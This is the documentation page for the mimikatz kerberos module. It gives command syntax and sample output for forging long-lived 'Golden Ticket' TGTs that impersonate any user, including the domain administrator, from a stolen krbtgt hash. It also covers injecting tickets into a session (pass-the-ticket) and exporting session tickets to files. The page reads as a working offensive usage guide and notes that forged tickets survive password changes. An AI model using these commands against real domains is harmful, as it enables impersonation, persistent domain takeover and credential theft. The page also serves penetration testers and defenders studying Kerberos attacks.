-
Notifications
You must be signed in to change notification settings - Fork 3.7k
module ~ kerberos
This module can be used without any privilege. It permits to play with official Microsoft Kerberos API - http://msdn.microsoft.com/library/windows/desktop/aa378099.aspx - and to create offline 'Golden tickets', free, long duration TGT
tickets for any users 😄
Lots of informations : [fr] http://1drv.ms/1fuEU28
Willy Wonka's choice
This command create a long duration Kerberos ticket, a TGT
for 10 years, for any user you want (eg: the domain administrator 😤).
Arguments:
-
/user
- the username you want to impersonate, keep in mind that Administrator is not the only name for this well-known account. -
/domain
- the fully qualified domain name (eg:chocolate.local
). -
/sid
- the SID of the domain (eg:S-1-5-21-130452501-2365100805-3685010670
). -
/krbtgt
- theNTLM
hash of thekrbtgt
account (fromNTDS.DIT
orlsadump::samrpc /patch
). -
/id
- optional - the id of the user - default is:500
for the well-known Administrator. -
/groups
- optional - id of groups the user belongs (first is primary group, comma separator) - default is:513,512,520,518,519
for the well-known Administrator's groups. -
/ticket
- optional - filename for output the ticket - default is:ticket.kirbi
.
mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
User : utilisateur
Domain : chocolate.local
SID : S-1-5-21-130452501-2365100805-3685010670
User Id : 1107
Groups Id : *513
krbtgt : 310b643c5316c8c3c70a10cfb17e2e31
-> Ticket : utilisateur.chocolate.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
Remarks:
- password changing/smartcard usage does not invalidate Golden Ticket;
- this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;
-
NTLM
hash ofkrbtgt
account is never changed automatically.
See also:
- Pass-The-Hash: sekurlsa::pth
- [fr] http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
- [pl] http://zine.net.pl/blogs/mgrzeg/archive/2014/01/20/kerberos-a-lsass.aspx
- [en] http://rycon.hu/papers/goldenticket.html
Pass-The-Ticket
Injects a Kerberos ticket in the current session (TGT
or TGS
).
Argument:
-
filename
- the ticket's filename
mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi
Ticket 'Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi' successfully submitted for current session
Remark: if used with tickets external to mimikatz
, tickets must be in Kerberos credential format (KRB_CRED
) - http://tools.ietf.org/html/rfc4120#section-5.8
See also:
- Pass-The-Hash: sekurlsa::pth
- [fr] http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
- [pl] http://zine.net.pl/blogs/mgrzeg/archive/2014/01/20/kerberos-a-lsass.aspx
- [en] http://rycon.hu/papers/goldenticket.html
Displays informations about the TGT
of the current session.
mimikatz # kerberos::tgt
Keberos TGT of current session :
Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
Service Name (02) : krbtgt ; CHOCOLATE.LOCAL ; @ CHOCOLATE.LOCAL
Target Name (--) : @ CHOCOLATE.LOCAL
Client Name (01) : Administrateur ; @ CHOCOLATE.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key (12) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Ticket (00 - 12) : [...]
(NULL session key means allowtgtsessionkey is not set to 1)
Remark: If session key is filled with 00, then allowtgtsessionkey
is not enabled - http://support.microsoft.com/kb/308339 - the session key will not be exported for TGT
with kerberos::list /export
unless you set it, it's not a problem with TGS
.
sekurlsa::tickets /export
works without this key because it reads raw memory.
Lists and export Kerberos tickets (TGT
and TGS
) of the current session.
Argument:
-
/export
- optional - export all tickets to files
mimikatz # kerberos::list /export
[00000000] - 12
Start/End/MaxRenew: 24/04/2014 14:54:56 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
Server Name : krbtgt/CHOCOLATE.LOCAL @ CHOCOLATE.LOCAL
Client Name : Administrateur @ CHOCOLATE.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
* Saved to file : 0-40e10000-Administrateur@krbtgt~CHOCOLATE.LOCAL-CHOCOLATE.LOCAL.kirbi
[00000001] - 12
Start/End/MaxRenew: 24/04/2014 15:13:03 ; 25/04/2014 00:54:56 ; 01/05/2014 14:54:56
Server Name : cifs/srvcharly.chocolate.local @ CHOCOLATE.LOCAL
Client Name : Administrateur @ CHOCOLATE.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
* Saved to file : 1-40a50000-Administrateur@cifs~srvcharly.chocolate.local-CHOCOLATE.LOCAL.kirbi
See also:
Purges all tickets of the current session.
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK